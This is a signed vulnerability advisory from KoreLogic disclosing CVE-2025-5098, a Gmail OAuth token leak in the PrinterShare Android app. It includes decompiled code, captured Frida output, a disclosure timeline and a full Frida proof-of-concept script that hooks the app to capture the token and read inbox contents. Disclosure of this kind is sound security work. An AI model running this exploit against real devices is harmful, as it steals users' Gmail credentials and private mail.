-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-003: Mobile Dynamix PrinterShare Mobile Print Gmail Oauth Token Disclosure Title: Mobile Dynamix PrinterShare Mobile Print Gmail Oauth Token Disclosure Advisory ID: KL-001-2025-003 Publication Date: 2025-05-22 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-003.txt 1. Vulnerability Details Affected Vendor: Mobile Dynamix Affected Product: PrinterShare Mobile Print Affected Version: up to 12.15.01 Platform: Android CWE Classification: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor, CWE-313: Cleartext Storage in a File or on Disk CVE ID: CVE-2025-5098 2. Vulnerability Description PrinterShare Android application allows the capture of Gmail authentication tokens that can be reused to access a user's Gmail account without proper authorization. 3. Technical Description * Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite) * Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device. * Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US * The target Activity is exported true. Which means any application may interact with it, given that permissions are provided. * The attacking host needs to attach the device email to the application - this can be done by simply opening the application and clicking 'Gmail'. Then choose the account to be used by the application. The vulnerability is initiated in the ActivityGmail.java activity. But is reintroduced in the ActivityGmailConversation.java. As such, the attacking host can capture the authentication token for Gmail and compromise the confidentiality of the inbox. Token Leakage in ActivityGmail.java: public void J(String str) { this.f4859p = strArr; strArr[0] = str; // Account email strArr[1] = bundle.getString("authtoken"); // OAuth token stored in plaintext } And reintroduced in the ActivityGmailConversation.java: String[] strArr = this.f4899l; if (strArr != null && strArr.length == 2) { this.f4902o = intent.getExtras().getLong("s_label_id"); this.f4903p = intent.getExtras().getLong("u_label_id"); String[] c3 = F.a.c(this.f4899l); // Token reused here for cookie authentication cookieManager2.setCookie("mail.google.com", c3[1]); } Demonstrating the leaking of memory by running the frida script. This first captures the authtoken, then uses the token to leak the Gmail inbox of the device owner. [SM T220::com.dynamixsoftware.printershare ]-> [*] Starting Fixed Gmail Monitor with Token Tracking [+] Found ActivityGmail class [*] Hooks installed with token monitoring [*] Launching Gmail activity [*] Gmail Activity onCreate called [*] Authentication started for account: redacted@gmail.com [+] Auth Token Found in Bundle: g.a000tQh5vDPCLJf2wPtT95aN7sn2msxMRMMjlUs2SKsQl0rSSXAaODTrDtQyLsUB[REDACTED] [*] Message loading thread started [-] Error accessing thread data: cannot read property 'value' of undefined [*] Message loading completed [+] View data at position 0: Conversation ID: undefined Messages: undefined Labels: undefined From: >> firebase-noreply Content: [Firebase] Client access to your Cloud Firestore database has expired - ...SNIP... Date: Feb 17 [+] View data at position 1: Conversation ID: undefined Messages: undefined Labels: undefined From: >> Me Content: testtwo - here ya go email auto sync to app Date: Feb 17 [+] View data at position 2: Conversation ID: undefined Messages: undefined Labels: undefined From: >> Me Content: test - test Date: Feb 17 4. Mitigation and Remediation Recommendation No response from vendor. There are no known mitigations to end-users of the affected application versions. 5. Credit This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc. 6. Disclosure Timeline 2025-04-09 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-11 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-29 : KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com. 2025-05-22 : KoreLogic public disclosure. 7. Proof of Concept [exploit.js] Java.perform(function() { console.log("[*] Starting Fixed Gmail Monitor with Token Tracking"); var ActivityGmail = Java.use("com.dynamixsoftware.printershare.ActivityGmail"); console.log("[+] Found ActivityGmail class"); // Add token monitoring ActivityGmail.J.implementation = function(str) { console.log("[*] Authentication started for account:", str); var result = this.J(str); // Monitor the auth token after authentication try { var creds = this.f4859p; if (creds && creds.value && creds.value.length > 1) { console.log("[+] Auth Token Leaked:", creds.value[1]); } } catch(e) { console.log("[-] Error accessing token:", e.message || e); } return result; }; // Monitor Bundle getString operations for additional token leaks var Bundle = Java.use("android.os.Bundle"); Bundle.getString.overload('java.lang.String').implementation = function(key) { var value = this.getString(key); if (key === "authtoken") { console.log("[+] Auth Token Found in Bundle:", value); } return value; }; // Existing hooks remain unchanged ActivityGmail.onCreate.implementation = function(bundle) { console.log("[*] Gmail Activity onCreate called"); this.onCreate(bundle); }; var adapterClass = Java.use("com.dynamixsoftware.printershare.ActivityGmail$l"); adapterClass.getView.implementation = function(position, convertView, parent) { var view = this.getView(position, convertView, parent); try { var tagData = view.getTag(); if(tagData) { var strArray = Java.cast(tagData, Java.use("[Ljava.lang.String;")); console.log("[+] View data at position " + position + ":"); console.log(" Conversation ID: " + strArray[0]); console.log(" Messages: " + strArray[1]); console.log(" Labels: " + strArray[2]); } var fromView = view.findViewById(view.getContext().getResources().getIdentifier("from", "id", "com.dynamixsoftware.printershare")); var snippetView = view.findViewById(view.getContext().getResources().getIdentifier("snippet", "id", "com.dynamixsoftware.printershare")); var dateView = view.findViewById(view.getContext().getResources().getIdentifier("date", "id", "com.dynamixsoftware.printershare")); if(fromView && snippetView && dateView) { console.log(" From: " + Java.cast(fromView, Java.use("android.widget.TextView")).getText()); console.log(" Content: " + Java.cast(snippetView, Java.use("android.widget.TextView")).getText()); console.log(" Date: " + Java.cast(dateView, Java.use("android.widget.TextView")).getText()); } } catch(e) { console.log("[-] Error accessing view data:", e.message || e); } return view; }; var threadClass = Java.use("com.dynamixsoftware.printershare.ActivityGmail$b"); threadClass.run.implementation = function() { console.log("[*] Message loading thread started"); try { var parentActivity = this.this$0.value; if(parentActivity) { var vector = parentActivity.f4852i; if(vector) { console.log("[+] Message vector found"); } } } catch(e) { console.log("[-] Error accessing thread data:", e.message || e); } this.run(); console.log("[*] Message loading completed"); }; // Launch the activity Java.scheduleOnMainThread(function() { try { console.log("[*] Launching Gmail activity"); var currentApplication = Java.use('android.app.ActivityThread').currentApplication(); var context = currentApplication.getApplicationContext(); var Intent = Java.use('android.content.Intent'); var intent = Intent.$new(); intent.setClass(context, ActivityGmail.class); intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK.value); context.startActivity(intent); } catch(e) { console.log("[-] Launch error:", e.message || e); } }); console.log("[*] Hooks installed with token monitoring"); }); The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmgvonkaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkenS5RAAiNBa+SfolsmZqT9rYubk rQpRCcVCDmDk3R0h/rCZikiotCB6hQnG++LWxrHMafxLWqvsmB0O8FMTjSg5Tz79 fLZYmIOBxg2i+F2dEeJNtwPd9gFsIuFTeOAhSJV2WaQd8j8ioNnu/rFty7kwL0Ky FmELALLRShRL5DIwNgNh/Rr0YZa8zCA6deTJjuxGZFkIEcit2SbkzCBL1+jOBKaC p4oex4o7rgVRRHmUyoDLwsIay8BLYwGbJqI2aPC5thEJIkbIeny43f0/KvPZrBMt mtPhsWzIZ66DyYu2zPKQTXBHg9oeqRRDydl5y8Tmc1HDLlzJk9qRMA2OF/mj+uyu 3S80QSn1GySH/QENniadDQxMc50D5MMf4GzCeLbdSASQVIFfDzZSQx058ytB1F3R l9RyPeA+FjZRPsycJzLeHOplkDXQIp421Olwz1lArDCZnA7LPPe5X/3XpVATMS/R fMFtVNF9zSnTkwM2U1akhdakqaUbQNwPRVOH/T4u9GlM4UjsuopPU5DgilnHBYti 22J00DiNO53IKso52htD/Evwu/HmlPy38PKT1C/4S1wl06G0TpaS2XRdM3WC53Ld WGrOvNQqoruQmX4hevmQFdYoWjtvGptwMPegRaGwchgPfdxzQpo85x2YakVwB4RE JUWlcpy1knCU9X5uf9ty0V8= =DAYY -----END PGP SIGNATURE-----